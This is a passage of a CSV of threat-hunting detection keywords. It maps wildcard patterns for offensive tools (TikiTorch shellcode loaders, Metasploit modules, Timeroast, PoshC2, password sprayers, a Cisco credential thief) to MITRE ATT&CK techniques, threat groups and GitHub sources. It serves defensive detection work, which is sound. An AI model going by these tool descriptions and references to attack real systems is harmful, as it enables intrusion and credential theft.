shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiLoader.dll*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"*TikiLoader.Injector*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiLoader\TikiLoader*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiSpawn.dll*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiSpawn.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiSpawn.ps1*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiSpawnAs*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiSpawnAsAdmin*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiSpawnElevated*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiSpawnWOppid*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiSpawnWppid*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiTorch.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*TikiVader.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*timemachine_cmd_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*timeroast.ps1*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" +"*timeroast.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" +"*timestomp c:*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*timing_attack * --brute-force*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*timwhitez/Doge-Loader*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" +"*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","ntlm decoder","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" +"*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*tls-scanner -connect *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*tmdb-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*tmp*ciscophones.tgz*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - 